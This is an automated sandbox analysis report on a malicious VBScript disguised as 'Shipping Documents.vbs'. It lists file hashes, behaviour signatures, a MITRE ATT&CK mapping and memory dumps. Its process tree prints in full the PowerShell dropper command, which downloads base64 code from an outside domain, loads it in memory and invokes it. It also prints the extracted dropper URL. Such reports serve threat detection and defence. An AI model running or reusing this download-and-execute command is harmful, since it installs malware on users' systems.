Analysis

  • max time kernel
    43s
  • max time network
    46s
  • platform
    windows7_x64
  • resource
    win7-20220812-en
  • resource tags

    arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
  • submitted
    20-09-2022 09:51

General

  • Target

    Shipping Documents.vbs

  • Size

    238KB

  • MD5

    c04015263d6b7d7c61500d4697482ded

  • SHA1

    c8e2650daceb47092a0148ddbb01589f8e0753cf

  • SHA256

    50d77e9665f36bbd70b2c09236f5c4894a10764d297eeb62f04bea73fe61d080

  • SHA512

    b47ba415a8ead211b5df22d63cd7ad3362b5bff3d9dade22c3b945c5e109674a84cf90d27b5da20bdc0b4451c9a4b3622d9212953dd98527ba45e19c461585d4

  • SSDEEP

    48:9K0VTMGN+ZjZfU6dx9MqoS3ALu0H0PzoDfqEXcGNg9IT:9Kk6jL9M+3Qu0ULmfz/T

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://contadoreshbc.com/dll_nostartup

Signatures

  • Blocklisted process makes network request 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Shipping Documents.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:560
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Byte[]] $rOWg = [system.Convert]::FromBase64string((New-Object Net.WebClient).DownloadString('https://contadoreshbc.com/dll_nostartup'));[System.AppDomain]::CurrentDomain.Load($rOWg).GetType('Fiber.Home').GetMethod('VAI').Invoke($null, [object[]] ('txt.fsfgjdsvjsshdjaaaakemenn/42.021.871.591//:ptth'))
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:948

Network

MITRE ATT&CK Matrix ATT&CK v6

Discovery

System Information Discovery

1
T1082

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/560-54-0x000007FEFBB81000-0x000007FEFBB83000-memory.dmp
    Filesize

    8KB

  • memory/948-55-0x0000000000000000-mapping.dmp
  • memory/948-57-0x000007FEF3EF0000-0x000007FEF4913000-memory.dmp
    Filesize

    10.1MB

  • memory/948-59-0x0000000002664000-0x0000000002667000-memory.dmp
    Filesize

    12KB

  • memory/948-58-0x000007FEF3390000-0x000007FEF3EED000-memory.dmp
    Filesize

    11.4MB

  • memory/948-60-0x000000000266B000-0x000000000268A000-memory.dmp
    Filesize

    124KB

  • memory/948-61-0x0000000002664000-0x0000000002667000-memory.dmp
    Filesize

    12KB

  • memory/948-62-0x000000000266B000-0x000000000268A000-memory.dmp
    Filesize

    124KB